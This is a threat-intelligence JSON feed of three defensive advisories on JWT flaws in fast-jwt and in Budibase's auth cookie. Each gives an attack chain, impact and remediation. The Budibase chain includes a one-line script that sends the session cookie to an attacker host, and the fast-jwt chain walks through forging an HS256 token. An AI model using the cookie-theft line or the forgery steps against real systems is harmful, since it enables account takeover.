{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/jwt/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2025-59420"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["jwt","vulnerability","authentication","authorization"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003efast-jwt\u003c/code\u003e library, versions 6.1.0 and below, does not validate the \u003ccode\u003ecrit\u003c/code\u003e (Critical) Header Parameter as required by RFC 7515, section 4.1.11. The \u003ccode\u003ecrit\u003c/code\u003e array names header parameters that a verifier must understand and process; a verifier that does not implement every listed parameter must reject the JWS. \u003ccode\u003efast-jwt\u003c/code\u003e instead accepts tokens whose \u003ccode\u003ecrit\u003c/code\u003e array names extensions it does not support, so the constraint the extension was meant to express is silently dropped. The vulnerability, identified as CVE-2026-35042, matters most in environments that mix JWT verification libraries, because the same token is then treated inconsistently across services. This flaw enables attackers to bypass security policies and token binding protections that are signalled through \u003ccode\u003ecrit\u003c/code\u003e, creating a window for unauthorized access or actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker obtains a JWT whose header carries a \u003ccode\u003ecrit\u003c/code\u003e array naming an extension that \u003ccode\u003efast-jwt\u003c/code\u003e does not implement (e.g., \u0026ldquo;x-custom-policy\u0026rdquo;), together with the extension header parameter itself (e.g., \u003ccode\u003e\u0026quot;x-custom-policy\u0026quot;: \u0026quot;require-mfa\u0026quot;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe token carries a valid signature under a key and algorithm the verifier accepts (e.g., HS256). An attacker who holds the signing key could already forge arbitrary claims; the distinctive effect of this flaw is that any validly signed token, including one issued legitimately with a \u003ccode\u003ecrit\u003c/code\u003e extension, is accepted with the extension\u0026rsquo;s constraint ignored.\u003c/li\u003e\n\u003cli\u003eThe attacker presents the token to an application that verifies it with the vulnerable \u003ccode\u003efast-jwt\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe library verifies the signature but never compares the \u003ccode\u003ecrit\u003c/code\u003e array against the extensions it supports, so the token is accepted.\u003c/li\u003e\n\u003cli\u003eThe application logic proceeds on the accepted token, potentially granting access or privileges the extension was meant to gate.\u003c/li\u003e\n\u003cli\u003eIf other JWT libraries in the same environment \u003cem\u003edo\u003c/em\u003e enforce \u003ccode\u003ecrit\u003c/code\u003e, a \u0026ldquo;split-brain\u0026rdquo; verification scenario results: some systems reject the token while others accept it.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is to bypass intended security policies, such as multi-factor authentication or token binding requirements, and gain unauthorized access or control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-35042) has three consequences. First, in mixed-library environments it creates a split-brain verification scenario in which different systems interpret the same token differently. Second, it allows attackers to bypass security policies enforced through the \u003ccode\u003ecrit\u003c/code\u003e header, such as mandatory multi-factor authentication. Third, where a binding requirement is signalled through \u003ccode\u003ecrit\u003c/code\u003e, it can circumvent token binding mechanisms (RFC 7800 \u003ccode\u003ecnf\u003c/code\u003e confirmation), weakening overall authentication security. The full impact analysis is described in CVE-2025-59420. This vulnerability affects applications using \u003ccode\u003efast-jwt\u003c/code\u003e version 6.1.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003efast-jwt\u003c/code\u003e library to a version greater than 6.1.0 to remediate CVE-2026-35042.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect fast-jwt crit Header Bypass Attempt\u0026rdquo; to identify attempts to exploit this vulnerability in your environment.\u003c/li\u003e\n\u003cli\u003eIf a mixed-library JWT verification environment exists, evaluate and standardize on a single JWT library that correctly handles the \u003ccode\u003ecrit\u003c/code\u003e header parameter, or at least confirm that every verifier in the request path rejects unrecognized \u003ccode\u003ecrit\u003c/code\u003e entries.\u003c/li\u003e\n\u003cli\u003eReview existing JWT usage to identify instances where the \u003ccode\u003ecrit\u003c/code\u003e header is used for security policy enforcement. Note that a patched verifier only rejects extensions it does not know; the application must still implement the semantics of each extension it declares support for (for example, checking a \u003ccode\u003ecnf\u003c/code\u003e key against the presented credential), so confirm that validation is actually in place.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T22:01:25Z","date_published":"2026-04-03T22:01:25Z","id":"/briefs/2026-04-fast-jwt-crit-validation-bypass/","summary":"The fast-jwt library fails to validate the 'crit' header, allowing attackers to bypass security policies and causing split-brain verification in mixed-library environments.","title":"fast-jwt Library Vulnerability 
Allows crit Header Validation Bypass","url":"https://feed.craftedsignal.io/briefs/2026-04-fast-jwt-crit-validation-bypass/"},{"_cs_actors":[],"_cs_cves":[{"cvss":5.9,"id":"CVE-2023-48223"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["jwt","algorithm-confusion","vulnerability","fast-jwt","nodejs"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe fast-jwt library, a popular Node.js package for handling JSON Web Tokens (JWTs), contains an algorithm confusion vulnerability. An incomplete fix for CVE-2023-48223 (GHSA-c2ff-88x2-x9pg) can be bypassed when the RSA public key configured on the verifier begins with whitespace. Specifically, the \u003ccode\u003epublicKeyPemMatcher\u003c/code\u003e regex in \u003ccode\u003efast-jwt/src/crypto.js\u003c/code\u003e only recognizes the PEM header at the very start of the string, so a key that starts with a newline is classified as an HMAC secret rather than an RSA public key, and HS256 becomes an acceptable algorithm for it. Because the public key is not secret, an attacker can compute a valid HMAC-SHA256 over arbitrary claims using the same whitespace-prefixed key bytes and present a forged HS256 token that the verifier accepts, leading to unauthorized access and privilege escalation. The vulnerability affects fast-jwt versions \u0026lt;= 6.1.0 and is a direct bypass of the fix for CVE-2023-48223.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a server using the vulnerable fast-jwt library to verify RSA-signed tokens.\u003c/li\u003e\n\u003cli\u003eThe attacker retrieves the server\u0026rsquo;s RSA public key, which is often publicly available.\u003c/li\u003e\n\u003cli\u003eThe attack requires that the key string the server passes to \u003ccode\u003ecreateVerifier\u003c/code\u003e itself begins with whitespace (for example, a newline picked up when the PEM was loaded from a configuration file or environment variable). The HMAC is computed over the key bytes exactly as the server holds them, so the attacker prefixes the public key with the same whitespace.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JWT with the header specifying the HS256 algorithm (\u003ccode\u003ealg: 'HS256'\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker sets the payload of the JWT to contain desired claims, such as \u003ccode\u003eadmin: true\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker signs the JWT with HMAC-SHA256, using the whitespace-prefixed RSA public key as the secret.\u003c/li\u003e\n\u003cli\u003eThe attacker presents the forged HS256 token to the vulnerable server.\u003c/li\u003e\n\u003cli\u003eThe server, having misclassified its key as an HMAC secret, allows HS256, recomputes the HMAC with the public key bytes, finds that it matches, and grants access based on the claims in the forged token.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to bypass authentication and authorization controls, potentially gaining administrative privileges or access to sensitive data. This could lead to data breaches, system compromise, and reputational damage. The impact is significant because of the widespread use of the fast-jwt library and because the forged token looks like any other bearer token in transit: the main observable signal is an HS256 header arriving at a verifier that was configured with an RSA key.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of the \u003ccode\u003efast-jwt\u003c/code\u003e library that addresses this vulnerability. This will require updating the \u003ccode\u003efast-jwt\u003c/code\u003e package in your \u003ccode\u003epackage.json\u003c/code\u003e file and redeploying your application.\u003c/li\u003e\n\u003cli\u003eAs an immediate mitigation, sanitize RSA public keys by trimming leading whitespace before using them with the \u003ccode\u003efast-jwt\u003c/code\u003e library. This can be done using the \u003ccode\u003e.trim()\u003c/code\u003e method in JavaScript before passing the key to the \u003ccode\u003ecreateVerifier\u003c/code\u003e function. Independently of the trim, pin the permitted algorithms explicitly in the verifier options (\u003ccode\u003ecreateVerifier\u003c/code\u003e accepts an \u003ccode\u003ealgorithms\u003c/code\u003e allow-list) so that verification never depends on inferring the key type from its bytes.\u003c/li\u003e\n\u003cli\u003eDeploy the brief\u0026rsquo;s Sigma rule for HS256 tokens verified against RSA keys to identify exploitation attempts. The \u003ccode\u003ealg\u003c/code\u003e header and the key type are visible only in application-level JWT verification logs, not in process creation events, so the rule needs that log source to be effective.\u003c/li\u003e\n\u003cli\u003eImplement logging and monitoring for JWT verification processes to detect anomalies and suspicious activity. Specifically, monitor for instances where HS256 is used with keys that appear to be RSA public keys.\u003c/li\u003e\n\u003cli\u003eReview and update any existing security controls related to JWT handling to ensure they are effective against this type of algorithm confusion attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-fast-jwt-bypass/","summary":"The fast-jwt library is vulnerable to JWT algorithm confusion via a whitespace-prefixed RSA public key, an incomplete fix for CVE-2023-48223: an attacker can use the public key as an HMAC secret to sign arbitrary payloads that the verifier accepts, potentially leading to privilege escalation.","title":"fast-jwt Library JWT Algorithm Confusion Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-fast-jwt-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to read the cookie\u0026rsquo;s contents through \u003ccode\u003edocument.cookie\u003c/code\u003e. An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account. Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, so it is also transmitted over plaintext HTTP and attached to cross-site requests, exacerbating the risk. 
This vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eThe attacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload that reads the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie via \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes in the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker replays the stolen JWT in their own requests to the Budibase application, bypassing the normal login procedure.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the victim\u0026rsquo;s account for as long as the token remains valid and can act as the victim: accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie turns every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to data breaches, unauthorized application modifications, and further propagation of malicious content. This affects all Budibase deployments running vulnerable versions, potentially a wide range of organizations using the platform for internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule accompanying this brief to detect potential JWT theft via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can currently lead to full account takeover. Note that \u003ccode\u003ehttpOnly\u003c/code\u003e only prevents the token from being read and exfiltrated; an XSS payload can still issue authenticated requests from the victim\u0026rsquo;s browser while the page is open, so fixing the XSS remains necessary after the upgrade.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"}],"language":"en","title":"CraftedSignal Threat Feed — Jwt","version":"https://jsonfeed.org/version/1.1"}